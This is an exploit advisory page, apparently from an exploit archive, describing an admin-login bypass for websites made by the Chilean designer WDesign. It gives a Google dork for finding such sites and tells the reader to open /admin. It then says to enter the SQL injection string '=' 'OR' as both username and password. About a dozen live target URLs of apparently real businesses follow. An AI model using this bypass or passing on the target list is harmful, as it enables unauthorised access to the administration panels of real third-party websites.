Diseñado por WDesign Admin Page Bypass
Posted on 30 November -0001
<HTML><HEAD><TITLE>Diseñado por WDesign Admin Page Bypass</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Diseñado por WDesign Admin Page Bypass # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.wdesign.cl # Google Dork : intext:"Diseñado por WDesign" # Date: 05 04 2016 # Tested On : Kali / iceweasel # Contact: <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="5b35682f75333a38303e291b3c363a323775383436">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> ###################### # # Search dork and select Target , put /admin after url such as : http://site.com/admin # Now enter fill username and password like the information below : # Username : '=' 'OR' # Password : '=' 'OR' # # e.g: # http://www.albertorocco.cl/admin/ # http://www.capia.cl/admin/ # http://www.bancoadnbovino.cl/admin/ # http://www.rucamalen.cl/admin/ # http://www.inmobisur.cl/admin/ # http://www.autotrans.cl/admin/ # http://www.purotoro.com/admin/ # http://www.luzpropiedades.cl/admin/ # http://www.2arquitectas.cl/admin/ # http://www.decoserviceltda.cl/admin/ # http://www.mueblesgavisuarez.cl/admin/ # http://www.congresosyeventos.cl/admin/ # # ###################### # discovered by : Net Hacker ###################### </BODY></HTML>